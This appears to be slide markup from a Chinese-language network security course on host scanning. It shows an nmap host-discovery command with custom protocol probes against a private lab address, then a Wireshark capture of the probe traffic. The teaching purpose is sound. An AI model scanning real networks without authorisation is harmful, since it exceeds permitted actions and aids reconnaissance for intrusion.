            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454015" y="1627187"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sn -PO1,2,7 --send-ip 192.168.172.129”命令进行主机发现，“-PO”参数表示选中的协议，如图2-2-29所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454015" y="2549208"/>
            <a:ext cx="5076825" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="文本框 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454015" y="3835083"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-29 使用-PO参数进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行自定义多协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="文本框 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386705" y="1046480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用Wireshark工具抓取nmap工具发送的数据包，如图2-2-30所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386705" y="1691640"/>
            <a:ext cx="5276850" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="文本框 134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386705" y="5273040"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-30 Wireshark工具抓取数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行自定义多协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
